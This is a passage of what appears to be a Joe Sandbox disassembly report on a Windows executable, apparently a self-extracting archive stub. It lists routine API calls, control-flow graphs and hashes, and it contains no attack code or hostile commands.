                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
                                                                                    • IsDialogMessageW.USER32(00010442,?), ref: 0101B59E
                                                                                    • TranslateMessage.USER32(?), ref: 0101B5AC
                                                                                    • DispatchMessageW.USER32(?), ref: 0101B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 1266772231-0
                                                                                    • Opcode ID: cbeb2090ebcb233e1ee31587ddbb6687d4271b7f762d8560e5861f5fb4a6348f
                                                                                    • Instruction ID: 1633354f7ded88808f9f7caf4b745224206bf1a6314bb01919f5ab00f27dd280
                                                                                    • Opcode Fuzzy Hash: cbeb2090ebcb233e1ee31587ddbb6687d4271b7f762d8560e5861f5fb4a6348f
                                                                                    • Instruction Fuzzy Hash: 2AF0BD71A0111ABB9B309BE59D5CEDB7FBCEE052917004415F549D6018EB3DD109CBF0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1070 102ba27-102ba51 call 10297e5 call 102bb4e call 102b7bb 1077 102ba53-102ba55 1070->1077 1078 102ba57-102ba6c call 1028e06 1070->1078 1079 102baaa-102baad 1077->1079 1082 102ba6e-102ba84 call 102bbf0 1078->1082 1083 102ba9c 1078->1083 1086 102ba89-102ba8f 1082->1086 1085 102ba9e-102baa9 call 1028dcc 1083->1085 1085->1079 1088 102ba91-102ba96 call 10291a8 1086->1088 1089 102baae-102bab2 1086->1089 1088->1083 1092 102bab4 call 1028b6f 1089->1092 1093 102bab9-102bac4 1089->1093 1092->1093 1094 102bac6-102bad0 1093->1094 1095 102badb-102baf5 1093->1095 1094->1095 1098 102bad2-102bada call 1028dcc 1094->1098 1095->1085 1099 102baf7-102bafe 1095->1099 1098->1095 1099->1085 1101 102bb00-102bb17 call 102b691 1099->1101 1101->1085 1105 102bb19-102bb23 1101->1105 1105->1085
                                                                                    APIs
                                                                                      • Part of subcall function 010297E5: GetLastError.KERNEL32(?,01041030,01024674,01041030,?,?,01023F73,00000050,?,01041030,00000200), ref: 010297E9
                                                                                      • Part of subcall function 010297E5: _free.LIBCMT ref: 0102981C
                                                                                      • Part of subcall function 010297E5: SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 0102985D
                                                                                      • Part of subcall function 010297E5: _abort.LIBCMT ref: 01029863
                                                                                      • Part of subcall function 0102BB4E: _abort.LIBCMT ref: 0102BB80
                                                                                      • Part of subcall function 0102BB4E: _free.LIBCMT ref: 0102BBB4
                                                                                      • Part of subcall function 0102B7BB: GetOEMCP.KERNEL32(00000000,?,?,0102BA44,?), ref: 0102B7E6
                                                                                    • _free.LIBCMT ref: 0102BA9F
                                                                                    • _free.LIBCMT ref: 0102BAD5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorLast_abort
                                                                                    • String ID: x)J$x)J
                                                                                    • API String ID: 2991157371-3623248832
                                                                                    • Opcode ID: d7a31a8cd288fa3f91d81a588df67527517fff90a1b69377d74b8a654781c9dd
                                                                                    • Instruction ID: 93a33c4286e6209fb94db67e843b16da32ba58145b6613e35fb493199b194c46
                                                                                    • Opcode Fuzzy Hash: d7a31a8cd288fa3f91d81a588df67527517fff90a1b69377d74b8a654781c9dd
                                                                                    • Instruction Fuzzy Hash: 68312D3190422AAFDB21EFACD440BDD77F5EF40325F2541DAE5849B2A1EB765D40CB50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1106 101dbde-101dc12 call 101ec50 SetEnvironmentVariableW call 1010371 1111 101dc14-101dc18 1106->1111 1112 101dc36-101dc38 1106->1112 1113 101dc21-101dc28 call 101048d 1111->1113 1116 101dc1a-101dc20 1113->1116 1117 101dc2a-101dc30 SetEnvironmentVariableW 1113->1117 1116->1113 1117->1112
                                                                                    APIs
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0101DBF4
                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0101DC30
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentVariable
                                                                                    • String ID: sfxcmd$sfxpar
                                                                                    • API String ID: 1431749950-3493335439
                                                                                    • Opcode ID: 850df30a4f5e5b0c47ea5ab2e3f99354199c666ab2e54cbb0138fcca1181f591
                                                                                    • Instruction ID: 9cb1007f255d773dcb693c674015889c190e70ac8f314e663e60cf7efa3ee115
                                                                                    • Opcode Fuzzy Hash: 850df30a4f5e5b0c47ea5ab2e3f99354199c666ab2e54cbb0138fcca1181f591
                                                                                    • Instruction Fuzzy Hash: 6BF0ECB240422AB7DB212FD9CC49AFB3BACBF14781B040855BDC59901DE7BC8480D7B0
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 01009795
                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 010097AD
                                                                                    • GetLastError.KERNEL32 ref: 010097DF
                                                                                    • GetLastError.KERNEL32 ref: 010097FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                    • String ID:
                                                                                    • API String ID: 2244327787-0
                                                                                    • Opcode ID: 6545140cd34ddedeb9647957c0237f1e5d49cd2bb9343428f59914b5565625ab
                                                                                    • Instruction ID: 96ad69860a02c9ad5b6ecdd5c7c81921caf53b7ec2ea1dd63a076b0d0c50013a
                                                                                    • Opcode Fuzzy Hash: 6545140cd34ddedeb9647957c0237f1e5d49cd2bb9343428f59914b5565625ab
                                                                                    • Instruction Fuzzy Hash: C011C231900204EBFF734E29C84466D77ECFB40328F108669F5DE852C2D7798A44CB61
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0100D710,00000000,00000000,?,0102ACDB,0100D710,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue), ref: 0102AD66
                                                                                    • GetLastError.KERNEL32(?,0102ACDB,0100D710,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue,01037970,FlsSetValue,00000000,00000364,?,010298B7), ref: 0102AD72
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0102ACDB,0100D710,00000000,00000000,00000000,?,0102AED8,00000006,FlsSetValue,01037970,FlsSetValue,00000000), ref: 0102AD80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3177248105-0
                                                                                    • Opcode ID: 7702202ce62b2b8673daab281bf138dfbbcf702a38eaf41812698db52a170fd5
                                                                                    • Instruction ID: 0751f8038fa6d3f97cf8c9002dd80e6159192b0d3865aa8b6ace89b4c9ebaa40
                                                                                    • Opcode Fuzzy Hash: 7702202ce62b2b8673daab281bf138dfbbcf702a38eaf41812698db52a170fd5
                                                                                    • Instruction Fuzzy Hash: BE01D436701236EBC772596C9C84A5B7B9CAF056A37110620F987D7545DB2AD401C7E0
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0100D343,00000001,?,?,?,00000000,0101551D,?,?,?), ref: 01009F9E
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0101551D,?,?,?,?,?,01014FC7,?), ref: 01009FE5
                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0100D343,00000001,?,?), ref: 0100A011
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite$Handle
                                                                                    • String ID:
                                                                                    • API String ID: 4209713984-0
                                                                                    • Opcode ID: c1857082255e6a049a902268d9f6581954f2aca25d20e63ba46c94aacdd09cf7
                                                                                    • Instruction ID: 493a91900ea6ba7a0376d952b5b7f2b7dbb6d2942c63b486677dcdc525178ea5
                                                                                    • Opcode Fuzzy Hash: c1857082255e6a049a902268d9f6581954f2aca25d20e63ba46c94aacdd09cf7
                                                                                    • Instruction Fuzzy Hash: FF31DF71208309EFEB16CE24D858BBEB7A9FB80715F04051CF9C55B2D1C776A948CBA2
                                                                                    APIs
                                                                                      • Part of subcall function 0100C27E: _wcslen.LIBCMT ref: 0100C284
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A2D9
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A30C
                                                                                    • GetLastError.KERNEL32(?,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A329
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2260680371-0
                                                                                    • Opcode ID: 5905f848c35a093a069ae5fcde5d633ac699b35c27b95da228acb529f66d5cef
                                                                                    • Instruction ID: 2753721b89d16633d4da004b44c93eea8ea069dc90c5e05c833055b3f4a33166
                                                                                    • Opcode Fuzzy Hash: 5905f848c35a093a069ae5fcde5d633ac699b35c27b95da228acb529f66d5cef
                                                                                    • Instruction Fuzzy Hash: BC019235700324EAFF63AA794849BED7788AF09680F048494FAC1D70C4D698D58187A5
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0102B8B8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Info
                                                                                    • String ID:
                                                                                    • API String ID: 1807457897-3916222277
                                                                                    • Opcode ID: ba188ca890e86d4939bc96032415b636620f1406a3b2f572a34015cb0f752316
                                                                                    • Instruction ID: 8f3a7bf5e30a118955fe2a2897e48e7c3e210e6cfc639311d24a4aca95e09aab
                                                                                    • Opcode Fuzzy Hash: ba188ca890e86d4939bc96032415b636620f1406a3b2f572a34015cb0f752316
                                                                                    • Instruction Fuzzy Hash: 7C41E6716042AC9EDB228E688C84BFABBF9EB55304F1408EDD5DA87142D275AA45CF60
                                                                                    APIs
                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0102AFDD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: String
                                                                                    • String ID: LCMapStringEx
                                                                                    • API String ID: 2568140703-3893581201
                                                                                    • Opcode ID: c7fef48be2296cca53707560364f8cb9835b6ca405959bf9b56271051d34957a
                                                                                    • Instruction ID: fc26a525c943a906db5dc6c05d9e3b3fbff72a473449783ad4b3c627160805c6
                                                                                    • Opcode Fuzzy Hash: c7fef48be2296cca53707560364f8cb9835b6ca405959bf9b56271051d34957a
                                                                                    • Instruction Fuzzy Hash: 4101D37260021AFBCF129F91DC05DEE7FA6FB48750F014259FE546A160CA3A8931EB90
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0102A56F), ref: 0102AF55
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                    • API String ID: 2593887523-3084827643
                                                                                    • Opcode ID: 302a019dbeaf82214919972e0eea13124c5f90502faf52fd30f98011303ebe8e
                                                                                    • Instruction ID: 0cd4227ebb1f8c79556e1aa949217fd28dea33b59e134ef13fec1096ed568925
                                                                                    • Opcode Fuzzy Hash: 302a019dbeaf82214919972e0eea13124c5f90502faf52fd30f98011303ebe8e
                                                                                    • Instruction Fuzzy Hash: 48F0BE7164521DFBCB125F55CC01CAEBFA9EF48B11B4142AAFD889B210DE364A10AB85
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Alloc
                                                                                    • String ID: FlsAlloc
                                                                                    • API String ID: 2773662609-671089009
                                                                                    • Opcode ID: 9cbe2b318088d838a01eb4e32772cfc8ce853ec239d613cbffde1ea34ad3e691
                                                                                    • Instruction ID: 3a21702ad11497728db6cb2e0387121dbf0560affef3f07ab36b39d74d4d022f
                                                                                    • Opcode Fuzzy Hash: 9cbe2b318088d838a01eb4e32772cfc8ce853ec239d613cbffde1ea34ad3e691
                                                                                    • Instruction Fuzzy Hash: 0FE02B7174122DBBD711AB6ADC02D6EBB9CEB54721B01029EFC869F300CD755E0187D5
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0101EAF9
                                                                                      • Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
                                                                                      • Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: 3Qo
                                                                                    • API String ID: 1269201914-1944013411
                                                                                    • Opcode ID: 9afa2990cb248d5ee6738347147f801d3f77db4849f43d9f2ff7470d64b7aad7
                                                                                    • Instruction ID: 6a392caec40f87ad32311ed5acac0c46c4695ec0245888cf11c8964c0505cc9c
                                                                                    • Opcode Fuzzy Hash: 9afa2990cb248d5ee6738347147f801d3f77db4849f43d9f2ff7470d64b7aad7
                                                                                    • Instruction Fuzzy Hash: CAB012C729A0437C30056201DE01C3F010CE6D1D90320C01FFCC8DC044DC853C060471
                                                                                    APIs
                                                                                      • Part of subcall function 0102B7BB: GetOEMCP.KERNEL32(00000000,?,?,0102BA44,?), ref: 0102B7E6
                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0102BA89,?,00000000), ref: 0102BC64
                                                                                    • GetCPInfo.KERNEL32(00000000,0102BA89,?,?,?,0102BA89,?,00000000), ref: 0102BC77
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: CodeInfoPageValid
                                                                                    • String ID:
                                                                                    • API String ID: 546120528-0
                                                                                    • Opcode ID: 68ef42276056663f9dd3458a6bc31962d0c03b25a1b1a1ebe56c2e83fb602d98
                                                                                    • Instruction ID: dc26fb32cbd1b25910bc1b75880fbe1b411f7fc4dd38961313886e2f0b740b56
                                                                                    • Opcode Fuzzy Hash: 68ef42276056663f9dd3458a6bc31962d0c03b25a1b1a1ebe56c2e83fb602d98
                                                                                    • Instruction Fuzzy Hash: 4251557090026A9FEB21EF39C4806FABFF5EF11300F2844AEC5D68B251EA399545CB91
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,01009A50,?,?,00000000,?,?,01008CBC,?), ref: 01009BAB
                                                                                    • GetLastError.KERNEL32(?,00000000,01008411,-00009570,00000000,000007F3), ref: 01009BB6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer
                                                                                    • String ID:
                                                                                    • API String ID: 2976181284-0
                                                                                    • Opcode ID: 482f6d8db5c0bce1668ae7537059063390ec8a5e9216608f8bff20ea8c6ca937
                                                                                    • Instruction ID: 7557fd9c4df2f93c6a0fc0a5dc7a825324d032f683c303b97ce969a12a1e8d67
                                                                                    • Opcode Fuzzy Hash: 482f6d8db5c0bce1668ae7537059063390ec8a5e9216608f8bff20ea8c6ca937
                                                                                    • Instruction Fuzzy Hash: 9841E030504B018FFB26CF18C6845AABBE9FBD4338F44896DE8D9832D2D774A8448B91
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 01001E55
                                                                                      • Part of subcall function 01003BBA: __EH_prolog.LIBCMT ref: 01003BBF
                                                                                    • _wcslen.LIBCMT ref: 01001EFD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
